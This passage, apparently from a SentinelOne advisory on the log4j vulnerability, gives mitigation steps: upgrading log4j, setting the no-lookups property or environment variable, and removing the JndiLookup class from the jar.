SentinelOne is actively monitoring the situation and collaborating with industry partners to improve the collective defense of all internet users.

Mitigation Guidance

  • Upgrade log4j 2 to the latest version, specifically log4j-2.15.0-rc2 or newer.
  • According to Apache’s guidance, in releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

Additional Resources